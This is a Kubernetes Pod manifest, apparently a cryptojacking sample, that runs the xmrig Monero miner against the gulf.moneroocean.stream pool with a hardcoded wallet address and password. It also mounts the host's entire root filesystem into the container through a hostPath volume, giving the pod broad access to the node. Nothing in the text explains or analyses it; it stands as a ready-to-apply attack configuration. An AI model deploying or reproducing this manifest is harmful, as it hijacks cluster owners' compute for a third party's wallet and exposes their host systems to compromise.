apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec
spec:
  containers:
  - name: xmrig-container
    image: busybox
    command:
    - ./xmrig
    args:
    - -o
    - gulf.moneroocean.stream:80
    - -u
    - 87T57vEfgmKevdUuXwsjZGYpZ8FUR5LuuZA8BGG9sQ91hUbaqRh7HywdxhKQcqvqbsaPuZktbBzPy5cwPpXtJh275TpS7U5
    - -p
    - piD3ceiver
    volumeMounts:
    - name: xmrig-volume
      mountPath: /
  volumes:
  - name: xmrig-volume
    hostPath:
      path: /
